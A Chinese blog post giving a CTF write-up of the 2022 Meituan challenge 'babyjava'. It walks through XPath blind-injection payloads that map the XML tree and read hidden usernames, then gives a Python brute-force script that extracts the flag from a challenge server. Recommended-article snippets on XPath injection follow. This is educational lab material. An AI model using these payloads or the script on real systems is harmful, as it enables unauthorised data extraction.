2022美团网络安全高校挑战赛(初赛)babyjava(XPath注入)

最新推荐文章于 2024-05-23 08:52:28 发布
最新推荐文章于 2024-05-23 08:52:28 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: 比赛wp 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/126907622
版权

 有一个输入框,测试需要带着user1,

构造注入:user1' and 1=1 and ''=' 回显为:user1

user1' and 1=2 and ''='  回显为:This information is not available

 证实存在Xpath盲注

xpath=user1' and count(/*)=1 and ''='   #通过判断得知根节点有一个

payload = user1' and string-length(name(/*))=4 and ''='" #测试得出根结点长度为4

通过回显得出根节点名称为root :
xpath=user1' and substring(name(/*),1,1)='r' and ''=' # 盲注得到结点名为root

通过回显判断/root下的子节点个数

xpath=user1' and count(/root/*)=1 and ''=' #通过判断得知/root只有一个子结点

payload =user1' and string-length(name(/root/*))=4 and ''='" #得到/root/下结点名长度为4

xpath=user1' and substring(name(/root/*),1,1)='r' and ''=' # 盲注得到结点名为user

通过回显判断/root/user下的子节点个数

xpath=user1' and count(/root/user/*)=2 and ''=' #通过判断得知/root/user下有两个子结点

 xpath=user1' and string-length(name(/root/user/*[1]))=8 and ''='

xpath=user1' and string-length(name(/root/user/*[2]))=8 and ''='

得出两个结点名称长度都为8

xpath=user1' and substring(name(/root/user/*[1]),1,1)='a' and ''='

xpath=user1' and substring(name(/root/user/*[2]),1,1)='a' and ''='

得到两个结点都叫username

读取两个username的内容

xpath=user1' and count(/root/user/username[1]/*)=0 and ''=' #username下面没有结点,应该是文本

xpath=user1' and substring(/root/user/username[1]/text(),1,1)='a' and ''=' #测username[1]

盲注得出,username[1]为user1

username[2]即为我们要的flag

最后附上拿flag的python脚本,其中payload可以更改

import requests
import string
import re
url = "http://eci-2zef43pmhep3r5ym8ggc.cloudeci1.ichunqiu.com:8888/hello"

s = requests.session()

strs = string.printable

flag = ''
for i in range(1,100):
    for j in strs:
        payload = "user1' and substring(/root/user/username[2]/text(),{},1)='{}' and ''='".format(i,j)
        data = {
            "xpath": payload
        }
        r = s.post(url,data=data)
        txt = re.findall('<p>(.+?)</p>',r.text)
        #print(txt)
        if "user1" in txt:
            flag += j
            print(flag)
            break
        else:
            continue

葫芦娃42
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web渗透--27--XPath注入
武天旭的博客
09-16 1056
1、漏洞描述: XPath是主要针对XML文档部分寻址而设计研发的一种语言。XPath注入攻击是指利用XPath解析器的松散输入和容错特性,能够在URL、表单或其它信息上附带恶意的XPath查询代码,以获得权限信息的访问权并更改这些信息。XPath注入攻击是针对Web服务应用新的攻击方法,它允许攻击者在事先不知道XPath查询相关知识的情况下,通过XPath查询得到一个XML文档的完整内容。 XPath注入攻击利用两种技术,即XPath扫描和XPath...
XPATH 注入的介绍与代码防御
我就是我的博客
02-28 405
软件未正确对 XML 中使用的特殊元素进行无害化处理,导致攻击者能够在终端系统处理 XML 的语法、内容或命令之前对其进行修改。在 XML 中,特殊元素可能包括保留字或字符,例如“”、“"”和“&”,它们可能用于添加新数据或修改 XML 语法。我们发现用户可控制的输入并未由应用程序正确进行无害化处理,就在 XPath 查询中使用。例如,假定 XML 文档包含“user”名称的元素,每个元素各包含
从MySQL注入XPath注入
m0_69305074的博客
04-28 1040
0x00 XPath基础知识 这个部分只是单纯铺垫XPath基础知识,不涉及注入,了解XPath可以跳过 这里直接引用 w3school的XPath教程 中间的案例,因为里面给了好多示例,基本一看就懂的那种。 XPath是什么? XPath是用来从XML文档中进行查找信息的语言。 XPath节点(Node) XPath中有7种类型的节点:元素、属性、文本、命名空间、处理指令、注释以及文档(根)节点 这个没有太大了解的必要,知道节点这个名词就够了,不需要分得特别细致。 选取节点 后面都以..
2021美团CTF Writeup部分
最新发布
2401_84434570的博客
05-23 487
发现生成算法有些奇怪,感觉p*q和PP*QQ应该有些关系,使用python测试着生成一下,观察一下规律:(不想具体推到关系了)题目是一堆奇奇怪怪的符号,对字符进行搜索找到其内涵含义后发现找到了LaTex关键字。本菜鸡比较菜,有些安详,仅仅只搞出了两道题目。根据题目要求用md5进行加密,然后套一个flag得到。
web安全学习指南(红队安全技能栈)
A_991128a的博客
03-14 328
​ 无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至CSDN官方,朋友们如果需要可以点击这个链接免费领取。这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。可以根据自身情况,选择技术栈的发展方向。内网扫描神器,go语言跨平台,效率快,支持各类口令爆破,还有主机识别和web服务识别。可以提取流量中用户名&密码,NTML Hash,图片等,以及绘制网络拓扑。
xpath注入[NPUCTF2020]ezlogin
qq_62046696的博客
02-09 663
false or true or true and false ,如果是两个 false or true and false 不就是false了吗。PHP://filter/string.toupper/resource=/flag 转换为大写都可以绕过。不管输入什么,很容易发现登陆就超时了,说明这里token是不断刷新的。这样构造也是一样的目的都是为了闭合后面的',为啥有两个or呢。有的时候会因为网络报错,加一个time.sleep就可以了。这条命令是判断根目录有几个结点,
测试XPath注入.docx
09-06
XPath 注入是指攻击者通过提交恶意的 XPath 查询来破坏应用程序的逻辑或获取未授权访问的数据的安全漏洞。XPath 是一种用于导航 XML 文档并从中获取数据的解释型语言。许多时候,一个 XPath 表达式代表由一个文档...
XPath注入漏洞利用工具XPath-XCat.zip
07-19
XCat是一个命令行程序,用于辅助XPath注入漏洞的利用。XCat使用Python编写并开放源代码。XCat正常使用需要python的SimpleXMLWriter模块。 标签:XPath
xcat:XPath注入工具
05-02
XCat是一个命令行工具,可以利用和调查XPath盲注漏洞。 有关完整的参考,请阅读此处的文档: : 它支持大量功能: 自动选择注射(运行xcat injections以获得列表) 检测xpath解析器的版本和功能,并选择最快的...
XPath-Injection:XPath注入脚本
04-02
XPath注入是一种针对XML数据的攻击方式,通过构造恶意的XPath表达式来欺骗应用程序,获取未经授权的数据或者执行非预期的操作。这种攻击通常发生在应用接受用户输入的XPath查询,并直接用于解析XML文档时。在这个名...
xxxpwn:高级 XPath 注入工具
06-09
xxxpwn : XPath 过滤扩展工具 : 专为盲优化 XPath 1 注入攻击而设计 xxxpwn 使用各种 XPath 优化来查询来自存在 XPath 注入的位置提供的后端 XML 文档的自定义信息。 默认情况下,它会尝试检索整个远程数据库,尽管...
悟空云课堂 | 第六期:XPath注入漏洞
Tianqi_Wukong的博客
07-06 422
该栏目为中科天齐软件安全中心全新规划的悟空云课堂,每周五准时上线,旨在科普软件安全相关知识,助力企业有效防范软件安全漏洞,提升网络安全防护能力。 本期主题为XPath注入漏洞的相关介绍。 01 什么是XPath注入漏洞? XPath是一种用来在内存中导航整个XML树的语言,它使用路径表达式来选取XML文档中的节点或者节点集。 XPath注入是指程序使用外部输入动态构造用于从XML数据库检索数据的XPath表达式,但它没有过滤或错误地过滤该输入,这使攻击者可以控制查询的结构。攻击者可以控制从XML数据库中.
[ CTF ] WriteUp- 第五届2022美团网络安全高校挑战赛初赛
ZXW_NUDT的博客
09-27 1665
第五届2022美团网络安全高校挑战赛初赛
[CTF]2022美团CTF WEB WP
Sapphire037的博客
09-18 3544
2022美团CTF的WEB方向Write up
浅谈XPath注入检测思路和方法
pygain的博客
01-15 3698
我们都应该知道XPath这种语言是做什么的,就不细讲了,具体参见菜鸟教程 XPath语法详解 XML不是保存企业数据的,但是很多情况下都用来保存应用程序配置数据,小型应用程序也保存简单信息,例如角色权限等等
避免XPath 注入的危险
felixsyan的专栏
08-28 384
随着简单 XML API、Web 服务和 Rich Internet Applications (RIAs) 的发展,更多组织几乎在所有方面(从配置文件到远程过程调用)都采用 XML 作为数据格式。一些人已经使用 XML 文档代替更传统的纯文本文件或关系数据库,但是与任何其他允许外部用户提交数据的应用程序或技术相似,XML 应用程序可能容易受到代码注入的攻击,尤其是 XPath 注入攻击。 ...
第三届美团网络安全高校挑战赛初赛)部分writeUp
克格莫
05-24 1289
1.sql 扫目录发现check.php。 发现是post注入,fuzz一下之后构造以下payload: POST /check.php HTTP/1.1 Host: eci-2ze7rwkw5ezzihayuqha.cloudeci1.ichunqiu.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application
小知识点 :一个又一个的Java小baby
m0_47743171的博客
05-18 94
小知识点 这里边的内容都是在我这里暂时无法成体系的知识点 一、变量的作用域 成员变量:在类中声明,作用域为整个类 局部变量:在一个方法的内部声明,作用域为整个方法 方法参数:方法的参数,作用域为整个方法 二、静态变量和实例变量 类的成员变量:被static 关键字修饰的变量,叫类变量(或静态变量);不被static关键字修饰的变量,叫实例变量 静态变量和实例变量的区别: 1.类的静态变量在内存中只有一个,被类的所有实例共享。静态变量可以直接通过类名. 被访问 2.类的每一个实例都有相对应的实例变量。每创建一
CTF--baby_web
qq_40730029的博客
04-20 1756
CTF之攻防世界高手进阶题 baby_web 题目:想想初始页面是哪个 进入场景之后显示如下,跳到的是1.php,用抓包软件burpsuite抓包 在抓取到的信息右键发送到Repeater 点击GO页面如下,发现flag出现了 ...
SQL 注入XPath 注入、代码注入 示例
06-09
SQL 注入示例: 假设我们有一个用户登录的功能,对应的查询语句为: ``` string sql = "SELECT * FROM users WHERE username='" + username + "' AND password='" + password + "'"; ``` 攻击者可以通过输入特殊...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值